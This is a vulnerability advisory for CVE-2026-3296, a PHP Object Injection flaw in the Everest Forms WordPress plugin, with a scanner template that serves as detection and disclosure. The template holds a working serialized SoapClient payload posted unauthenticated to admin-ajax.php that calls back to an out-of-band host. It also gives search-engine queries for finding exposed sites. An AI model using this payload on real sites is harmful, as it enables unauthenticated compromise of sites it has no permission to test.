CVE-2026-3296: Everest Forms WordPress Plugin <= 3.4.3 - PHP Object Injection

2026-07-31 Everest Forms WordPress Plugin PoC Public

Description

The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.

PoC

id: CVE-2026-3296

info:
  name: Everest Forms WordPress Plugin <= 3.4.3 - PHP Object Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code when an administrator views malicious form entries, potentially leading to full site compromise.
  remediation: |
    Update to the latest version beyond 3.4.3.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms/
    - https://plugins.trac.wordpress.org/browser/everest-forms/
    - https://cisa.gov/known-exploited-vulnerabilities-catalog
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3296
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3296
    cwe-id: CWE-502
    epss-score: 0.03469
    epss-percentile: 0.88467
  metadata:
    verified: true
    max-request: 2
    vendor: wpeverest
    product: everest_forms
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/everest-forms/"
    fofa-query: body="/wp-content/plugins/everest-forms/"
    publicwww-query: "/wp-content/plugins/everest-forms/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,everest-forms,php-object-injection,vkev,vuln,passive

variables:
  oob_uri: "http://{{interactsh-url}}/"
  oob_len: "{{len(oob_uri)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/everest-forms/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Everest Forms')"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}

        action=evf_submit_form&evf_id=1&evf-field-1=test&evf-fields-meta=O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A{{oob_len}}%3A%22http%3A%2F%2F{{interactsh-url}}%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A{{oob_len}}%3A%22http%3A%2F%2F{{interactsh-url}}%2F%22%3Bs%3A15%3A%22_soap_version%22%3Bi%3A1%3Bs%3A13%3A%22_proxy_host%22%3BN%3B%7D

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 3.4.3')"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100e6931bd69d023ce31b75b48d5f96e452abaca8220317f6a9a966d5161b6ec74402201a13a83ffd1d4bb28829cfa49fbaa4e0931a5d44b5ac3078cc510ec7a50f75fa:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities